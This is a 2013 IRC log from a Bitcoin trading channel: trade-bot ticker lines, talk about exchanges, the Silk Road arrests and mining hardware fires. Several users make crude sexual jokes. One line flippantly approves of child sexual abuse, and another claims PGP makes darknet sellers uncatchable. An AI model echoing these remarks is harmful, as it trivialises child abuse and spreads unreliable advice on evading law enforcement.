essentially the regulators welcome recommendations in new areas Oct 08 02:37:53 of course they will do what they want Oct 08 02:38:02 that the regulators will accept submission, of that their plan will get the green light? Oct 08 02:38:17 lol. Oct 08 02:38:27 bitcoin cares about this now ? Oct 08 02:38:28 but generally you can see the difference between germany or cyprus asking for guidance, and the US sending subpeonas Oct 08 02:38:37 but anyway. http://www.youtube.com/watch?v=cajcEZ5Z-x8 Oct 08 02:38:38 tada! Oct 08 02:38:59 the plan is already green lit Oct 08 02:39:12 the question is whether they will get additional regulation Oct 08 02:39:20 the business plan shows executive salaries exceeding legals before they even open for business Oct 08 02:39:45 i suggest you talk to Danny about specifics Oct 08 02:39:51 it's not MY business after all Oct 08 02:40:07 and legally i shouldnt really be spekaing on it at all anyway Oct 08 02:40:11 speaking* Oct 08 02:40:17 [HAVELOCK] [AM1] 2 @ 1.15000001 = 2.3 BTC [-] **** BEGIN LOGGING AT Tue Oct 8 10:07:15 2013 Oct 08 10:07:44 bonjor miseur pimp Oct 08 10:09:27 http://www.youtube.com/watch?v=-KCBLA-fuVw Oct 08 10:09:27 Snoop Dogg & Wiz Khalifa "French Inhale" - YouTube Oct 08 10:09:32 how did shoot go? Oct 08 10:11:47 lolwut Oct 08 10:12:21 you werent taking photos of naked aldies just now? Oct 08 10:13:00 nope. Oct 08 10:13:58 who shoots naked ladies at 10 in the am. Oct 08 10:14:15 good light\ Oct 08 10:14:33 tired girls. Oct 08 10:15:16 if you ever want to go to prn movies, call me for the twisted lines Oct 08 10:15:53 you know ive got the line beween reality and fantasy that teh people want Oct 08 10:17:15 lolk Oct 08 10:19:49 gimme 20 for actresses and 10k for sets, you hold the camera and do sales Oct 08 10:20:33 ill have lezzo gagging for dick Oct 08 10:21:15 best movie ever, only available for bitcoin Oct 08 10:22:51 forbes and bloomberg Oct 08 10:24:22 c'mon Oct 08 10:24:57 you hear the press saying , new tech wheres the porn Oct 08 10:37:50 [BTCTC] [CRYPTO-TRADE] 21 @ 0.17 = 3.57 BTC [+] Oct 08 10:41:02 ill hold ethe camera and so sales Oct 08 10:59:26 if you dont get it by now, the omissions are more important than the inclusions. Oct 08 10:59:31 welcome back Oct 08 11:00:44 that was... odd. Oct 08 11:06:17 [MPEX] [S.MPOE] 7489 @ 0.00084211 = 6.3066 BTC [+] {3} Oct 08 11:11:22 [HAVELOCK] [AM100] 31 @ 0.01199999 = 0.372 BTC [-] Oct 08 11:52:40 Today Tonight @TodayTonight Oct 08 11:52:41 What is #Bitcoin? Did you know you can pay for drinks and food with #bitcoins in #Australia now? Oct 08 11:52:51 wrong room Oct 08 12:07:15 "The fact that we are here today to debate raising America’s debt limit is a sign of leadership failure. It is a sign that the U.S. Government can’t pay its own bills. It is a sign that we now depend on ongoing financial assistance from foreign countries to finance our Government’s reckless fiscal policies." Oct 08 12:07:27 obama is like... having a moment of clarity ? Oct 08 12:07:39 in... 2006. Oct 08 12:10:20 [BTCTC] [ASICMINER-PT] 1 @ 1.153 BTC [-] Oct 08 12:21:31 [MPEX] [S.MPOE] 5700 @ 0.00084241 = 4.8017 BTC [+] {3} Oct 08 12:27:38 [BTCTC] [ASICMINER-PT] 2 @ 1.152 = 2.304 BTC [-] Oct 08 12:28:39 [BTCTC] [ASICMINER-PT] 2 @ 1.152 = 2.304 BTC [-] Oct 08 12:30:41 [BTCTC] [LABCOIN] 32594 @ 0.00014954 = 4.8741 BTC [+] {6} Oct 08 13:18:10 btctc hasnt closed trading yet? Oct 08 13:23:32 [MPEX] [S.MPOE] 2928 @ 0.00083957 = 2.4583 BTC [-] Oct 08 13:23:32 [BTCTC] [FN] [DMS.SELLING] 183 @ 0.0041 = 0.7503 BTC [+] Oct 08 13:25:34 [BTCTC] [KENILWORTH] 150 @ 0.0007211 = 0.1082 BTC [+] Oct 08 13:27:36 [BTCTC] [LABCOIN] 1000 @ 0.00013 = 0.13 BTC [-] Oct 08 13:29:14 Ogedei, https://bitcointalk.org/index.php?topic=125629.msg3296116#msg3296116 Oct 08 13:35:44 [MPEX] [S.MPOE] 7384 @ 0.00084437 = 6.2348 BTC [+] Oct 08 13:38:47 [BTCTC] [FN] [DMS.SELLING] 1344 @ 0.004 = 5.376 BTC [-] Oct 08 13:41:50 [HAVELOCK] [B] [XBOND] 3937 @ 0.00126978 = 4.9991 BTC [+] {2} Oct 08 13:52:00 [BTCTC] [PETA-MINE] 39 @ 0.45002563 = 17.551 BTC [+] {4} Oct 08 13:53:01 [BTCTC] [PETA-MINE] 73 @ 0.41 = 29.93 BTC [-] Oct 08 14:27:35 [BTCTC] [LABCOIN] 4576 @ 0.0001301 = 0.5953 BTC [-] Oct 08 14:29:37 [HAVELOCK] [HIM] 10 @ 0.1166 = 1.166 BTC [+] {3} Oct 08 14:33:40 [BTCTC] [LABCOIN] 82131 @ 0.00017633 = 14.4822 BTC [+] {9} Oct 08 14:44:51 [MPEX] [S.MPOE] 7400 @ 0.00084194 = 6.2304 BTC [-] {2} Oct 08 14:45:15 the show must go on ! Oct 08 14:53:00 [BTCTC] [FN] [COG.F2] 1 @ 1 BTC [-] Oct 08 14:57:03 [HAVELOCK] [AM100] 70 @ 0.01198714 = 0.8391 BTC [-] {2} Oct 08 14:57:05 [HAVELOCK] [NEOBEE] 685 @ 0.00296149 = 2.0286 BTC [+] {4} Oct 08 14:58:05 [HAVELOCK] [NEOBEE] 275 @ 0.002977 = 0.8187 BTC [+] Oct 08 15:00:07 [HAVELOCK] [XBOND] [PAID] 0.69348300 BTC to 1`386`966 shares, 50 satoshi per share Oct 08 15:03:10 [MPEX] [S.MPOE] 10150 @ 0.00084441 = 8.5708 BTC [+] {2} Oct 08 15:06:12 [HAVELOCK] [NEOBEE] 1000 @ 0.00297799 = 2.978 BTC [+] Oct 08 15:07:14 [HAVELOCK] [NEOBEE] 2122 @ 0.00298494 = 6.334 BTC [+] {3} Oct 08 15:08:15 [HAVELOCK] [NEOBEE] 243 @ 0.00299998 = 0.729 BTC [+] Oct 08 15:18:38 http://i.imgur.com/xSOW1NG.jpg meh. Oct 08 15:23:18 meh is right. Oct 08 15:23:23 if you select the right timeframe you can probably make this graph show very different stuff Oct 08 15:23:35 also, no legends. lol Oct 08 15:23:50 no, there's legends. btc supposedly made 800% while the rest of the stuff 30 Oct 08 15:24:04 fior that matter if you take 1 year it goes from 5 to 130, ie, 6000% Oct 08 15:24:57 well, I guessed it was a %, but still Oct 08 15:25:11 that () instead of - is weird, though I remember seing it elsewhere Oct 08 15:25:12 it's trhere on the left Oct 08 15:25:35 no, there's the number, but it doesn't say what it is Oct 08 15:25:44 but most importantly, no dates Oct 08 15:25:54 () means negative. always has. Oct 08 15:25:56 you could probably show bitcoin doing -50% Oct 08 15:26:10 it's ugly Oct 08 15:33:40 [MPEX] [S.MPOE] 4488 @ 0.0008446 = 3.7906 BTC [+] {3} Oct 08 15:35:33 http://bitbet.us/bet/491/the-winklevoss-bitcoin-etf-to-be-open-for/#c1571 lol Oct 08 15:35:35 BitBet - The Winklevoss Bitcoin ETF to be open for public investment before December 1st 2013 Oct 08 15:41:48 [MPEX] [S.MPOE] 4900 @ 0.00084637 = 4.1472 BTC [+] {2} Oct 08 15:42:16 !jd Oct 08 15:42:17 Just-Dice stat: 1290 BTC profit, 55.2k BTC invested, 161.06 mio bets, 4.00 mio BTC wagered Oct 08 15:54:04 https://bitcointalk.org/index.php?topic=264696.msg3298572#msg3298572 Oct 08 15:54:06 [BTCT.CO] [IPO-cancelled] BTCGARDEN MINER---Eyes to the horizon Oct 08 15:59:59 They're still developing? Oct 08 16:02:07 [MPEX] [S.MPOE] 8500 @ 0.0008362 = 7.1077 BTC [-] {2} Oct 08 16:02:09 they did it without the ipo as they said Oct 08 16:02:27 the IPO was a stunt Oct 08 16:12:41 So Garden 1 Labcoin -1 Oct 08 16:20:25 [BTCTC] [BASIC-MINING] 5 @ 0.03737 = 0.1869 BTC [+] Oct 08 16:26:03 http://www.bbc.co.uk/news/technology-24443216 Oct 08 16:26:03 BBC News - Four UK men arrested over Silk Road links Oct 08 16:26:42 sucks to be them Oct 08 17:01:29 When I first fiscovered SR, I thought to myself, "Self, what are the inherent dangers in buying or selling anything on SR?" so I didnt Oct 08 17:02:55 waiting for a swat team to rape my asshole Oct 08 17:04:11 if you used PGP in all messages I fail to see how you could get caught Oct 08 17:04:22 even as a seller Oct 08 17:05:45 anything one should know why trading on btct is still possible? Oct 08 17:06:21 BBC News - Four UK men arrested over Silk Road links Oct 08 17:06:25 extended because of the technical issues of yesterday Oct 08 17:06:48 for 24h or whats the deal? Oct 08 17:06:58 24h I guess Oct 08 17:07:55 ah burnside wrote it on the forums Oct 08 17:15:20 [MPEX] [S.MPOE] 6854 @ 0.00084247 = 5.7743 BTC [+] Oct 08 17:17:22 [BTCTC] [ASICMINER-PT] 1 @ 1.145 BTC [-] Oct 08 17:27:32 [HAVELOCK] [NEOBEE] 100 @ 0.002999 = 0.2999 BTC [-] Oct 08 17:29:34 [BTCTC] [ASICMINER-PT] 1 @ 1.145 BTC [-] Oct 08 17:33:26 hmm, I thought sending shares to the issuer on btctc would share the oustanding/issued Oct 08 17:33:41 or is it cached? Oct 08 17:46:44 http://www.usnews.com/news/articles/2013/10/07/truckers-for-the-constitution-plan-to-slow-dc-beltway-arrest-congressmen Oct 08 17:46:44 'Truckers for the Constitution' Plan to Slow D.C. Beltway, Arrest Congressmen - US News and World Re Oct 08 17:50:54 [BTCTC] [S.MPOE-PT] 176 @ 0.00069989 = 0.1232 BTC [+] {3} Oct 08 17:53:32 Arrest congressmen? Oct 08 17:54:30 murca Oct 08 17:54:34 lol: http://www.youtube.com/watch?v=1D7J5YygEoM Oct 08 17:54:37 amazing country Oct 08 17:54:38 AMAZING COMPANY! Oct 08 17:54:53 amazing Oct 08 17:54:54 AMAZING COMPANY! Oct 08 17:54:57 There we go Oct 08 17:55:25 Anywho misleading title. And screw causing a slow down, that traffic for other people too Oct 08 17:55:30 So piss off with that Oct 08 17:56:01 I would be so mad if I knew a group of people were purposely going to cause traffic in my area for a fucking protest Oct 08 17:56:14 "Screw you man I'm trying to get to work" Oct 08 18:00:03 [BTCTC] [ASICMINER-PT] 22 @ 1.126 = 24.772 BTC [-] {4} Oct 08 18:00:43 I would be so mad if politicians stopped governmental porocess for stupid reasons Oct 08 18:00:46 oh yeah.... Oct 08 18:07:10 [BTCTC] [FN] [BTC-GROWTH] 7 @ 0.083 = 0.581 BTC [+] Oct 08 18:08:11 [BTCTC] [FN] [BTC-GROWTH] 14 @ 0.083 = 1.162 BTC [+] Oct 08 18:22:08 http://www.newyorker.com/online/blogs/elements/2013/10/how-lavabit-edward-snowden-email-service-melted-down.html Oct 08 18:22:08 How Lavabit Melted Down : The New Yorker Oct 08 18:28:31 [MPEX] [S.MPOE] 3150 @ 0.00084247 = 2.6538 BTC [+] Oct 08 18:29:30 https://bitcointalk.org/index.php?topic=307813.0 wat Oct 08 18:29:31 A Call To Reason Oct 08 18:31:34 [HAVELOCK] [CFIG] 3 @ 0.1337 = 0.4011 BTC [+] Oct 08 18:33:05 btct is done Oct 08 18:33:50 cool, I still had the time to buy one labcoin share for the lulz Oct 08 18:34:40 actually, I am the last labcoin trade. so much win! Oct 08 18:44:47 [HAVELOCK] [SMG] 2485 @ 0.0002299 = 0.5713 BTC [+] Oct 08 18:52:08 Probably last one ever Oct 08 18:54:56 [MPEX] [S.MPOE] 6850 @ 0.00084553 = 5.7919 BTC [+] {4} Oct 08 19:21:23 http://www.futureblock.com/ Oct 08 19:21:24 Future Block | Bet on the Bitcoin Hash Rate Oct 08 19:23:29 so it's on only 24h?! Oct 08 19:24:22 hm no 36 Oct 08 19:24:42 no 48, but bets open on 36 Oct 08 19:25:05 no Oct 08 19:25:08 ok I shup up Oct 08 19:26:05 bet on hashrate in 24h, bets open for 12h Oct 08 19:28:30 [HAVELOCK] [AM1] 64 @ 1.27530467 = 81.6195 BTC [+] {4} Oct 08 19:29:31 [HAVELOCK] [AM1] 12 @ 1.27999999 = 15.36 BTC [+] {3} Oct 08 20:03:04 [MPEX] [S.MPOE] 4693 @ 0.00084235 = 3.9531 BTC [-] Oct 08 20:24:44 this is boring..somebody do something. Oct 08 20:25:26 [HAVELOCK] [AM1] 2 @ 1.121 = 2.242 BTC [-] {2} Oct 08 20:49:53 and another one goes poof http://forum.kncminer.com/forum/main-category/hardware/5267-unit-s-catching-fire/page3 Oct 08 20:49:55 fire fire Oct 08 20:50:50 [HAVELOCK] [AM1] 24 @ 1.27 = 30.48 BTC [+] {2} Oct 08 20:52:56 http://tinypic.com/view.php?pic=2ci7d4h&s=5#.UlRGY1CUS4k Oct 08 20:52:56 Image - TinyPic - Free Image Hosting, Photo Sharing & Video Hosting Oct 08 20:55:06 are these consumer's machines or their demos? Oct 08 20:55:32 I have seen 4 pics of consumer machines Oct 08 20:55:38 what I got from BFL has been very reliable so far and just what i expected..a year and 2 months ago. Oct 08 20:55:42 ouch Oct 08 20:56:31 at this rate, we only have to wait another week for all of them to blow Oct 08 20:57:03 yeah..thats gonna be painful for knc and customers alike Oct 08 20:57:13 Well, they named the new smaller machine Oct 08 20:57:28 so the line up is Saturn, Jupiter and Uranus Oct 08 20:57:31 thats why i hate being first with technology Oct 08 20:58:13 yeah but here, first batch customers will roi in a month, second batch - never. Oct 08 20:58:58 [MPEX] [S.MPOE] 6709 @ 0.0008419 = 5.6483 BTC [-] {2} Oct 08 20:58:59 I heard you will be able to overclock Uranus Oct 08 20:59:19 there is a probing spot Oct 08 20:59:41 my anus? Oct 08 20:59:46 yeah it has a probing spot. Oct 08 20:59:58 alien probing. Oct 08 21:00:11 Saturn and Jupiter shall circle Uranus and search for Klingons. Oct 08 21:00:36 yeah they acctually hash KLI256 Oct 08 21:01:00 I wouldn't want that thing to explode in my anus :/ Oct 08 21:01:04 Well, I certainly hope Uranus does not catch fire Oct 08 21:01:19 oh Oct 08 21:01:53 i thought all bitcoiners wanted all other participants dead Oct 08 21:02:11 hence seding them bombs instead of miners Oct 08 21:02:18 lol, true Oct 08 21:02:40 butt maybe only catching fire to one anus is better Oct 08 21:04:09 i suspect they installed wrong blowup fuses Oct 08 21:04:19 those things should fry after warranty is over Oct 08 21:04:44 https://bitcointalk.org/index.php?board=76.0 Oct 08 21:04:45 Custom hardware Oct 08 21:05:39 should be just Urectum, much cleaner. Oct 08 21:08:17 Well, Uranus will produce 195GH Oct 08 21:08:31 minus 16% errors Oct 08 21:14:13 [HAVELOCK] [AM1] 10 @ 1.32 = 13.2 BTC [+] Oct 08 21:16:15 [HAVELOCK] [AM1] 15 @ 1.32 = 19.8 BTC [+] Oct 08 21:30:16 http://mulliganmint.com/just-saying-bitcoin-is-like-saying-bomb-on-an-airplane/ Oct 08 21:30:17 Just saying Bitcoin is like saying bomb on an airplane | Mulligan Mint Inc Oct 08 21:33:19 LOL: No one at Mulligan Mint was dragged into a storage room and questioned by Robert DeNiro. But Capital One did immediately shut down our merchant account to process credit card orders. Apparently, someone at the bank saw the word “Bitcoin” and didn’t bother to read the product description or any of our blogs about the coin. Oct 08 21:38:28 ;;ticker Oct 08 21:38:29 MtGox BTCUSD ticker | Best bid: 137.04000, Best ask: 137.49992, Bid-ask spread: 0.45992, Last trade: 137.04000, 24 hour volume: 3421.16545433, 24 hour low: 135.66000, 24 hour high: 137.89999, 24 hour vwap: 136.52242 Oct 08 21:41:57 forum people did not get my Uranus joke Oct 08 21:42:05 :/ they took it serious Oct 08 21:46:06 http://www.futureblock.com/ Oct 08 21:46:07 Future Block | Bet on the Bitcoin Hash Rate Oct 08 21:47:02 TAT posted that before. is he running it? Oct 08 21:47:28 shrug Oct 08 21:49:48 No I'm not running it Oct 08 21:50:08 just thought it was decent Oct 08 21:50:11 and shared Oct 08 21:50:21 I like it Oct 08 21:52:34 better designed than most btc sites Oct 08 21:52:37 visually Oct 08 21:53:59 TAT blamed for everything Oct 08 21:55:11 well, do you think the DDOS will continue for the next 12 hours =yes Oct 08 21:55:19 I win, gimme Oct 08 21:58:58 [MPEX] [S.MPOE] 3381 @ 0.00084075 = 2.8426 BTC [-] {3} Oct 08 22:03:02 [MPEX] [S.MPOE] 4837 @ 0.00083931 = 4.0597 BTC [-] Oct 08 22:19:17 [MPEX] [S.MPOE] 5500 @ 0.00084265 = 4.6346 BTC [+] Oct 08 23:13:10 [HAVELOCK] [NEOBEE] 94 @ 0.00299998 = 0.282 BTC [+] Oct 08 23:16:13 [MPEX] [S.MPOE] 2400 @ 0.00084601 = 2.0304 BTC [+] Oct 08 23:17:14 [MPEX] [S.MPOE] 4050 @ 0.00084376 = 3.4172 BTC [-] Oct 08 23:25:53 ;;tslb Oct 08 23:25:55 Time since last block: 26 minutes and 38 seconds Oct 08 23:35:22 ThickAsThieves: Gotchyer ears on? Oct 08 23:42:01 bitfunder is the next one, already Oct 08 23:42:35 jere? Oct 08 23:42:56 It appears as if I'm about to be banned from Bitfunder. Oct 08 23:43:12 lol why? Oct 08 23:43:17 Having commited the crime of being a US citizen. Oct 08 23:43:28 ************* Oct 08 23:43:29 Important Notice (October 8th, 2013): Oct 08 23:43:30 Please be advised that BitFunder is implementing the following rules and procedures: Oct 08 23:43:30 As of October 8th, 2013, BitFunder will not accept new registrations from any United States persons or entities. All new registrants must supply the information required to obtain "Verified" status on their linked WeExchange account. BitFunder may, in its sole direction, decline to accept any new registrations. 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Oct 08 23:44:58 sigh Oct 08 23:45:07 !q 5 Oct 08 23:45:08 Quote: http://dpaste.com/1410140/plain/ Oct 08 23:45:51 "No" is an acceptable answer. Oct 08 23:46:14 I have no plans to sell them so maybe keeping them on Bitfunder will be good for security. No one could hack my account and sell them. :) Oct 08 23:46:24 I just thought I'd ask. Oct 08 23:46:53 I think you shoujld wait Oct 08 23:46:58 as this is a larger issue Oct 08 23:47:11 Can you elaborate? Oct 08 23:47:30 you are one of many with this problem Oct 08 23:47:39 and this is a problem for Neo itself Oct 08 23:48:00 one that Neo will likely need/want to weigh in on Oct 08 23:48:06 or make plans around Oct 08 23:48:07 I *really* hope this doesn't interfere with their execution. Oct 08 23:48:20 I don't see why it would Oct 08 23:48:54 maybe CheckDavid will save us with his exchange! Oct 08 23:48:59 the irony here being that I planned to take mp aside to discuss the possibility of such things BEFORE they happened... Oct 08 23:49:13 or that cipher chick. Oct 08 23:49:25 of course I have no idea whether mp has any interest in hosting anything from me Oct 08 23:49:45 incuding Neo, and whether Neo would wnat to consider such movement either Oct 08 23:49:48 I'm not sure I'd care to pay the 30BTC fee to have an account on MPEx. Oct 08 23:49:57 Or whatever it is now. Oct 08 23:50:12 let's not jump ahead anyway Oct 08 23:50:33 Fair enough. I shall wait and see. Oct 08 23:50:33 i operate unde rthe assumption mp doesnt want any "play" assets from play exchanges anyway Oct 09 00:03:30 kakobrekla, lol Oct 09 00:04:00 I haven't actually migrated anyone from BTCT to BF yet Oct 09 00:04:08 only processed their data Oct 09 00:07:25 Jere_Jones: if mpex happens, you are welcome on coinbr Oct 09 00:07:52 http://www.youtube.com/watch?v=QAtVJzb65hQ Oct 09 00:07:53 Hitler finds out MtGox still haven't implemented Litecoin - YouTube Oct 09 00:15:56 TAT, I remember correctly that you are no US citizen? Oct 09 00:16:14 he is from the internets Oct 09 00:16:20 thank god Oct 09 00:16:54 I'm not familiar with coinbr Oct 09 00:17:29 I may just start my own exchange. With blackjack and hookers. Oct 09 00:19:14 i can help you familiarize :) Oct 09 00:19:15 [HAVELOCK] [NEOBEE] 99 @ 0.00299998 = 0.297 BTC [+] Oct 09 00:20:21 I was just looking over it. I find the monthly fee... prohibitive. I'm sure that is perfectly acceptable for an active trader. Oct 09 00:20:49 I'm not an active trader. I tend to buy and hold and (hopefully) collect dividends. Oct 09 00:21:33 http://shadowlife.cc/2013/10/tracking-the-silk-road-lessons-for-darknet-services/ Oct 09 00:21:34 Tracking the Silk Road – Lessons for darknet services « Shadow Life Oct 09 00:22:03 so, you expect dividends not much bigger than 0.09 BTC? Oct 09 00:23:01 A rich man, I am not. Oct 09 00:23:06 I am a US citizen Oct 09 00:23:20 I'm just a programmer that loves bitcoin. Oct 09 00:23:46 if i were not married i'd have left long ago Oct 09 00:24:07 My wife and I were just discussing moving back to Spain. Oct 09 00:24:35 That or Peru. Oct 09 00:34:21 Hmmm... 0.09 BTC is what only 3 shares of AM would spit out. Oct 09 00:35:41 The fee doesn't sound that bad in that context. Oct 09 00:35:57 I hold peanuts in my CoinBr account but I keep it open, Oct 09 00:36:05 i like to support jurov, Oct 09 00:36:18 and i know as soon as i close it, i'll need it again Oct 09 00:37:03 closing coinbr accounts is not supported anyway :D Oct 09 00:37:19 they just accumulate debt? hehehe Oct 09 00:37:47 no, if you sell/withdraw everything then no monthly fee is asked Oct 09 00:37:53 ah i see Oct 09 00:38:01 neat Oct 09 00:56:51 [HAVELOCK] [NEOBEE] 35 @ 0.0029 = 0.1015 BTC [-] Oct 09 01:08:23 jurov: that reminds me, whats teh grace period for funding a negative account? Oct 09 01:08:51 7 years Oct 09 01:09:08 harsh but fair Oct 09 01:09:11 thanks Oct 09 01:09:15 but seriously, it was not even decided yet Oct 09 01:09:34 why 7y would be harsh? Oct 09 01:09:44 cool cool, just checking I wont get punted or have stuff liquidated to cover Oct 09 01:09:52 its not harsh Oct 09 01:11:05 [HAVELOCK] [DEALCO] 51 @ 0.00600019 = 0.306 BTC [-] {2} Oct 09 01:11:18 we did not yet even consider asking interest on them :) Oct 09 01:12:40 that would probably be acceptable Oct 09 01:13:07 [HAVELOCK] [LABCO] 6592 @ 0.0003 = 1.9776 BTC [-] Oct 09 01:13:27 9000% compounding bisecondly Oct 09 01:18:55 lol... having 0.1 withdrawal fee is enough. but that one will likely change as bitcoin goes up Oct 09 01:20:14 [MPEX] [S.MPOE] 480 @ 0.00084376 = 0.405 BTC [-] Oct 09 01:20:37 http://www.futureblock.com/ - anyone seen this yet? Oct 09 01:20:38 Future Block | Bet on the Bitcoin Hash Rate Oct 09 01:27:19 20% fee wat Oct 09 01:27:48 *15.76 % but woah Oct 09 01:28:20 but it looks very nice Oct 09 01:32:26 [MPEX] [S.MPOE] 3500 @ 0.00084478 = 2.9567 BTC [+] Oct 09 01:34:03 fee high because bet is almost over Oct 09 01:34:05 starts at 0 Oct 09 01:34:13 ah i see Oct 09 01:38:51 yeah looks nice until you find out alberto is running it Oct 09 01:39:03 lol Oct 09 01:42:23 lol who is alberto? Oct 09 01:42:28 is that the bitcoindaytrade guy? Oct 09 01:42:44 yep, and labcoin apparently Oct 09 01:42:44 bdt/rebate/labcoin scammer Oct 09 01:42:55 dont forget bitscalper Oct 09 01:42:58 rebate? Oct 09 01:43:23 also zenpad Oct 09 01:43:37 http://www.reddit.com/user/locksley announced it, doesn't look like alberto Oct 09 01:44:39 [MPEX] [S.MPOE] 2550 @ 0.00084792 = 2.1622 BTC [+] Oct 09 01:44:44 and kronos.io Oct 09 01:45:20 and weed price analysis :) http://www.thepricegeek.com/blog/2013/08/22/market-price-of-drugs-on-silk-road/ Oct 09 01:45:57 lol that's cool Oct 09 01:51:21 smoke dem nugz Oct 09 02:01:36 .d Oct 09 02:01:36 189281249.28103 | Next Diff in 1641 blocks | Estimated Change: 10.3433% in 10d 5h 9m 2s Oct 09 02:09:12 what's new? Oct 09 02:10:22 jborkl interesting. Oct 09 02:12:59 so i kinda thought Cody Wilson was awesome until he teamed up with Taaki Oct 09 02:13:02 http://www.theverge.com/2013/9/25/4769916/3d-printed-gun-maker-cody-wilson-to-launch-bitcoin-dark-wallet Oct 09 02:13:03 3D-printed gun maker to launch Bitcoin wallet next | The Verge Oct 09 02:14:09 the irony here being that I planned to take mp aside to discuss the possibility of such things BEFORE they happened... << don't worry, it's how it works. I had made plans back in january and announced ppl about my conference last year, so as to make it BEFORE BTCprice went up. scheduled it for april, asshole btc went up in march. Oct 09 02:14:32 I'm not sure I'd care to pay the 30BTC fee to have an account on MPEx. << yuou can just use a borker. Oct 09 02:15:50 mod6 you know... peopel announcing other people teamed up with them is scarcely usavble to impugn those other people. Oct 09 02:16:10 [HAVELOCK] [CBTC] 500 @ 0.00028 = 0.14 BTC [-] {4} Oct 09 02:16:15 :D Oct 09 02:16:19 lol Oct 09 02:17:38 so i use some random online service. it does w/e well. i shoot the guy an email asking for his bitcoin addy because i want to send him some cents as encouragement. Oct 09 02:17:45 guy responds with gushing email and his bitcoin addy. Oct 09 02:17:48 inception. Oct 09 02:32:02 well, in regard to the insult ladder: http://bash.bitcoin-assets.com/?quote=6 :: I wish that the foundation didn't have such a presence so someone better might have gotten involved with Wilson. Oct 09 02:32:05 http://i.imgur.com/y3NN6bg.png poor poor rentalstarter Oct 09 02:33:16 oh maybe he wasnt with the foundation, just the 'bitcoin consultancy' or whatever. Oct 09 02:33:30 [HAVELOCK] [CBTC] 11085 @ 0.00025658 = 2.8442 BTC [-] {10} Oct 09 02:36:30 oh and intersango. of course. Oct 09 02:37:30 [HAVELOCK] [CBTC] 5000 @ 0.00024962 = 1.2481 BTC [-] {2} Oct 09 02:38:06 http://bitcoin-otc.com/viewgpg.php?nick=genjix Oct 09 02:38:06 #bitcoin-otc gpg key data Oct 09 02:38:24 haha, bitcoinica too i guess. Oct 09 02:38:31 [HAVELOCK] [AM100] 15 @ 0.01119474 = 0.1679 BTC [-] {3} Oct 09 02:39:32 [HAVELOCK] [AM100] 41 @ 0.01111246 = 0.4556 BTC [-] {3} Oct 09 02:40:11 mod6 taaki has anything to do with foundation now ?! Oct 09 02:40:53 no, at least, not that i know of. an error on my part. the 'bitcoin consultancy' Oct 09 02:40:58 unless that means the same thing Oct 09 02:41:34 [HAVELOCK] [B] [XBOND] 229 @ 0.00126978 = 0.2908 BTC [+] Oct 09 02:44:15 hi Oct 09 02:44:28 lel @ bitfunder Oct 09 02:46:07 hey TAT, given the current situation, you might think about offering those who are transferring their shares to BF to change their destination to HL Oct 09 02:49:42 [MPEX] [S.MPOE] 3145 @ 0.00084478 = 2.6568 BTC [-] Oct 09 02:50:00 it'd seem ThickAsThieves gets his first real taste of bitcoin business sudden rush of wtfomg these days. Oct 09 02:50:43 [HAVELOCK] [DEALCO] 25 @ 0.00748959 = 0.1872 BTC [+] {2} Oct 09 02:58:51 [HAVELOCK] [AM100] 10 @ 0.01236989 = 0.1237 BTC [+] Oct 09 02:59:15 maybe this is a good time to build a proper frontend for mpex Oct 09 03:00:19 in bootstrap ? Oct 09 03:00:36 lol Oct 09 03:01:24 yes, and highcharts *sarcasm_off* Oct 09 03:01:44 http://www.youtube.com/watch?v=xt4QeltSKL8 Oct 09 03:01:45 Trailer Porno Romanesc.avi - YouTube Oct 09 03:03:34 i bet it's funnier, if you understand what they say Oct 09 03:03:56 I like the mcxnow charts Oct 09 03:03:57 they get to bad english towards the end Oct 09 03:04:03 oh it seems to be highcharts too Oct 09 03:04:39 I don't think I know any romanian pornstar Oct 09 03:04:44 yeah, you do. Oct 09 03:04:51 lel Oct 09 03:05:05 female Oct 09 03:05:16 yes female. Oct 09 03:05:37 ah yes, forgot Mircea is a girl's name Oct 09 03:05:49 lol Oct 09 03:06:53 ;;google steve holmes alice romain Oct 09 03:06:54 Alice Romain sister to Sandra | Adult DVD Talk Forum | Porn Fan ...: ; Steve Holmes - Free Porn, Porn Tube, Free Porn Videos, Amateur ...: ; Sandra Romains Little Sister Does her First Porn Ever: yeah found Sandra Romain, I know Oct 09 03:07:48 I like her work in Hellfire Sex apparently Oct 09 03:08:03 lol "chuck it" Oct 09 03:08:13 also, these chicks : http://trilema.com/2012/doua-alternative-teoretice/ Oct 09 03:08:20 how many triplets that do porn do you know ? Oct 09 03:09:03 identical triplets? Oct 09 03:09:12 there are fraternal triplets? Oct 09 03:09:22 no reason why not, i suppose Oct 09 03:09:29 sure there are, and yes. Oct 09 03:09:39 I have no sister, but I never understood the incest taboo Oct 09 03:09:59 it doesn;t apply to girls. Oct 09 03:10:12 it never applies to girls Oct 09 03:10:34 pedolesbians are ok too Oct 09 03:10:49 i was always under the impression that any product of such union would be a horrible mess of recessive genetic defects brought to life Oct 09 03:11:03 but afaik girls can't impregnate each other Oct 09 03:11:03 [HAVELOCK] [AM100] 40 @ 0.01169999 = 0.468 BTC [-] Oct 09 03:11:09 nubbins` it's risky, but by no means not guaranteed failure. Oct 09 03:11:30 to quote some guy on some irc channel, "the island where i live had two moose couples introduced. now there's 150k of them" Oct 09 03:11:33 nubbins`: well yes, but the taboo is about sex, not having children Oct 09 03:11:45 mircea_popescu: it was 4 moose :( Oct 09 03:11:49 they tried 2 and it didn't work Oct 09 03:11:54 many people should not reproduce too (because bad gene combinations), but society thinks sex is ok Oct 09 03:12:12 oh, 2 moose couples Oct 09 03:12:16 reading comprehension Oct 09 03:12:46 did i mention i made a delicious moose stew yesterday? Oct 09 03:13:53 nubbins` 2couples. Oct 09 03:14:02 lol Oct 09 03:15:00 so anyway, i was wondering if any of you could recall an occasion where people created a new blockchain for the express purpose of keeping track of share ownership Oct 09 03:15:30 i.e. company does an ipo, sells 100k shares, creates genesis block showing 100k addresses with 1 satoshi in each Oct 09 03:15:46 none of this coloured coin stuff, but an actual separate blockchain altogether Oct 09 03:16:03 with the idea being that each satoshi represents 1 share Oct 09 03:16:50 why have 100k addys Oct 09 03:17:07 well i suppose 1 address per ipo shareholder makes more sense Oct 09 03:17:07 1 btc would equal to 100000000 shares, you can have it on a single addy Oct 09 03:17:22 sorry, i had all this written down somewhere but lost it Oct 09 03:17:40 anyway, each new block shows not btc changing hands but shares changing hands Oct 09 03:17:44 like its 1 address per bitcoin user except that its not Oct 09 03:18:07 nubbins` this is colored coins basically. Oct 09 03:18:18 iirc they did try aspecial coin at some point Oct 09 03:18:21 nobody would mine it Oct 09 03:18:25 heh Oct 09 03:18:27 sometime 2012 this Oct 09 